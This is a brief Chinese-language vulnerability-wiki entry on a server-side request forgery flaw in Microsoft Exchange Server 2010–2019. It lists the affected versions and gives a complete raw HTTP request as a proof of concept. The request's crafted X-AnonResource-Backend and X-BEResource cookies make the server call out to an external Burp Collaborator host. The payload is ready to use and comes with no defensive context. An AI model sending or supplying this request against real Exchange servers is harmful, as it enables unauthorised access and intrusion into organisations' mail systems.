免费、自由、人人可编辑的漏洞库
,
漏洞简介
Exchange服务器端请求伪造(SSRF)漏洞,利用此漏洞的攻击者能够发送任意HTTP请求并通过Exchange Server进行身份验证。
影响范围
Microsoft Exchange Server: 2010
Microsoft Exchange Server: 2013
Microsoft Exchange Server: 2016
Microsoft Exchange Server: 2019
SSRF
GET /owa/auth/x.js HTTP/1.1 Host: 0.0.0.0 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; Accept-Language: en Connection: close
pwnwiki.com
